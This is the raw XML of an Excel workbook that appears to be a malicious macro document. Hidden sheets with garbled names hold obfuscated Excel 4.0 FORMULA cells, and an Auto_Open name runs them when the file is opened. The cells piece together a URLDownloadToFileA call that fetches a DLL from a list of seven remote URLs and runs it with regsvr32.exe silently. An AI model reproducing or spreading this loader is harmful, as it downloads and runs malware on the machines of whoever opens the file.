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6m\CIR-ZV\CIR\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2DBD88F1-C6F7-4373-928B-DD3F179AF50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Cdfea" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Tgbs" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Tgbfgs" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="PCWV" sheetId="5" state="hidden" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="NEVR1">PCWV!$G$13</definedName>
    <definedName name="NEVR2">PCWV!$G$15</definedName>
    <definedName name="NEVR3">PCWV!$G$17</definedName>
    <definedName name="NEVR4">PCWV!$G$19</definedName>
    <definedName name="NEVR5">PCWV!$G$21</definedName>
    <definedName name="NEVR6">PCWV!$G$23</definedName>
    <definedName name="NEVR7">PCWV!$G$25</definedName>
    <definedName name="_xlnm.Auto_Open">PCWV!$G$1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1" i="3" l="1"/>
  <c r="I10" i="3"/>
  <c r="Q9" i="3"/>
  <c r="D7" i="3"/>
  <c r="F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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="19" uniqueCount="19">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> ..\rfs.dll</t>
  </si>
  <si>
    <t>"..\rfs.dll</t>
  </si>
  <si>
    <t>",0,0)</t>
  </si>
  <si>
    <t>,0,</t>
  </si>
  <si>
    <t>r"&amp;"eg"&amp;"s"&amp;"vr3"&amp;"2.e"&amp;"x"&amp;"e</t>
  </si>
  <si>
    <t>\W"&amp;"ind"&amp;"o"&amp;"w"&amp;"s\</t>
  </si>
  <si>
    <t>S"&amp;"ysW"&amp;"ow"&amp;"64\</t>
  </si>
  <si>
    <t>"http://buchhave.net/cache/t82rF5S/",</t>
  </si>
  <si>
    <t>"https://www.bellaitaliatour.com/gite/YcFHn/",</t>
  </si>
  <si>
    <t>"http://brainora.com/brand/Xf7eDVe/",</t>
  </si>
  <si>
    <t>"http://breustchabrierarchitectes.fr/bca/CW5pD/",</t>
  </si>
  <si>
    <t>"https://biasikazan.hu/system/NZv3MZ0Kji27aPVe/",</t>
  </si>
  <si>
    <t>"http://beta.orlandofoodtours.com/wp-content/uploads/mrJcJgcwH8p/",</t>
  </si>
  <si>
    <t>"http://bestsafe.co.uk/cgi-bin/S29alEny/",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</si>
</sst>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600075</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>7336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13C476-4CC6-4F3C-80B0-CC112DECA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24875" cy="283561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0124FFD-D8B1-4C57-9FC3-DE9478087DFA}">
  <dimension ref="G8"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="7" max="7" width="255.7109375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="8" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G8" t="b">
        <f>FORMULA(Cdfea!P22&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!F14&amp;Tgbfgs!S15&amp;Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR1"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!G16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G15)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR2"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!H14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G17)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR3"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!I16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G19)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR4"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!J14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G21)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR5"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!K16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G23)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR6"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!L14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G25)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR7"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!B15&amp;Cdfea!I17&amp;Cdfea!I3&amp;Cdfea!H13&amp;Cdfea!P11&amp;Cdfea!K9&amp;Cdfea!P13&amp;Cdfea!P7&amp;Cdfea!P13,G27)=FORMULA(Cdfea!P22&amp;Cdfea!H13&amp;Cdfea!N4&amp;Cdfea!H13&amp;Cdfea!H9&amp;Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!H9&amp;Cdfea!P20&amp;Tgbfgs!M12&amp;Tgbfgs!N8&amp;Tgbfgs!I4&amp;Tgbs!R21&amp;Tgbfgs!G10&amp;Cdfea!P15&amp;Cdfea!P13,G29)=FORMULA(Cdfea!P22&amp;Cdfea!G24&amp;Cdfea!H13&amp;Cdfea!E6&amp;Cdfea!E11&amp;Cdfea!G24&amp;Cdfea!K23&amp;Cdfea!P11&amp;Cdfea!P13,G34)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34" sqref="AM3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4DC43-2A26-40AB-9832-2194C1732D78}">
  <dimension ref="A2:Q37"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F6" sqref="F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1B45-B805-4F38-B230-891F0A33704C}">
  <dimension ref="D3:R21"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A8" sqref="A8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="4:17" x14ac:dyDescent="0.25">
      <c r="F3" t="str">
        <f>T(Cdfea!E2&amp;Cdfea!D7&amp;Cdfea!P15&amp;Cdfea!P7&amp;Cdfea!P15&amp;Cdfea!E11&amp;Cdfea!F4&amp;Cdfea!B15&amp;Cdfea!D13&amp;Cdfea!E2)</f>
        <v>on","URLDo</v>
      </c>
    </row>
    <row r="7" spans="4:17" x14ac:dyDescent="0.25">
      <c r="D7" t="str">
        <f>T(Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!B5&amp;Cdfea!C3&amp;Cdfea!C9&amp;Cdfea!A12)</f>
        <v>("urlm</v>
      </c>
    </row>
    <row r="9" spans="4:17" x14ac:dyDescent="0.25">
      <c r="Q9" t="str">
        <f>T(Cdfea!P15&amp;Cdfea!P7&amp;Cdfea!P15&amp;Cdfea!J6&amp;Cdfea!J6&amp;Cdfea!H9&amp;Cdfea!H9&amp;Cdfea!K14&amp;Cdfea!K14&amp;Cdfea!P15)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="10" spans="4:17" x14ac:dyDescent="0.25">
      <c r="I10" t="str">
        <f>T(Cdfea!D7&amp;Cdfea!C9&amp;Cdfea!E2&amp;Cdfea!D17&amp;Cdfea!F15&amp;Cdfea!E6&amp;Cdfea!E2&amp;Cdfea!B18&amp;Cdfea!G2&amp;Cdfea!C9)</f>
        <v>nloadToFil</v>
      </c>
    </row>
    <row r="14" spans="4:17" x14ac:dyDescent="0.25">
      <c r="F14" t="s">
        <v>12</v>
      </c>
      <c r="H14" t="s">
        <v>14</v>
      </c>
      <c r="J14" t="s">
        <v>16</v>
      </c>
      <c r="L14" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" spans="4:17" x14ac:dyDescent="0.25">
      <c r="G16" t="s">
        <v>13</v>
      </c>
      <c r="I16" t="s">
        <v>15</v>
      </c>
      <c r="K16" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="21" spans="18:18" x14ac:dyDescent="0.25">
      <c r="R21" t="str">
        <f>T(Cdfea!P19&amp;Cdfea!P2&amp;Cdfea!M7)</f>
        <v xml:space="preserve"> -s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98958-9042-4603-92C7-5EE1B68922FF}">
  <dimension ref="F4:S17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B3" sqref="B3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="4" spans="6:19" x14ac:dyDescent="0.25">
      <c r="I4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="5" spans="6:19" x14ac:dyDescent="0.25">
      <c r="Q5" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="8" spans="6:19" x14ac:dyDescent="0.25">
      <c r="N8" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="10" spans="6:19" x14ac:dyDescent="0.25">
      <c r="G10" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="12" spans="6:19" x14ac:dyDescent="0.25">
      <c r="M12" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" spans="6:19" x14ac:dyDescent="0.25">
      <c r="S15" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="6:19" x14ac:dyDescent="0.25">
      <c r="F16" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="17" spans="10:10" x14ac:dyDescent="0.25">
      <c r="J1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Cdfea</vt:lpstr>
      <vt:lpstr>Tgbs</vt:lpstr>
      <vt:lpstr>Tgbfgs</vt:lpstr>
      <vt:lpstr>PCWV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2022-03-16T16:25:56Z</dcterms:modified>
</cp:coreProperties>
</file>